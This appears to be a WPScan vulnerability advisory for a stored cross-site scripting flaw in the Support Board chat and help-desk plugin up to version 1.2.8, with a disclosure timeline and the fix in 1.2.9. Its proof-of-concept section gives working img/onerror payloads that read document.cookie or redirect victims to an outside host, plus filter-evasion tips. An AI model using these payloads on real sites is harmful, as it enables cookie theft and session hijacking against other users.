Support Board - Chat And Help Desk | Support & Chat <= 1.2.8 Stored XSS



Description
Info:
Weak security measures like bad textarea data filtering has been discovered in the Ā«Support Board - Chat And Help Desk | Support & ChatĀ».

Demo Website:
https://codecanyon.net/item/support-board-chat-and-help-desk/20752085
Backend: https://board.support/desk-demo/?login=true
Login / Password: demo@board.support / demo

Timeline (WPScan Team):
June 11th - Issue submitted to Envato
June 17th - Envato Support confirmed they are investigating the issue
June 17th - New version released with Fix (1.2.9)
Proof of Concept
Don't use double quotes inside your payload - they'll be filtered. Avoid to use specific protocol type like http: or https: - your payload will be broken.

Go to the demo website https://board.support/desk-demo/?login=true and log in with provided credentials (demo@board.support / demo). Most stable and usefull attack vector is to use the <img> tag with your payload inside, check the provided examples below.

Example #1: <img src=x onerror=alert(document.cookie)>
Example #2: <img src=x onerror=alert('m0ze');window.open('//m0ze.ru/')>
Example #3: <img src=x onerror=alert('m0ze');window.location='//m0ze.ru/'>

Affects Plugin

fixed in version 1.2.9

References

URL https://codecanyon.net/item/support-board-chat-and-help-desk/20752085

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 1312
Verified Yes
WPVDB ID 9351

Timeline

Publicly Published 2019-06-11 (about 1 month ago)
Added 2019-06-18 (about 1 month ago)
Last Updated 2019-06-23 (30 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin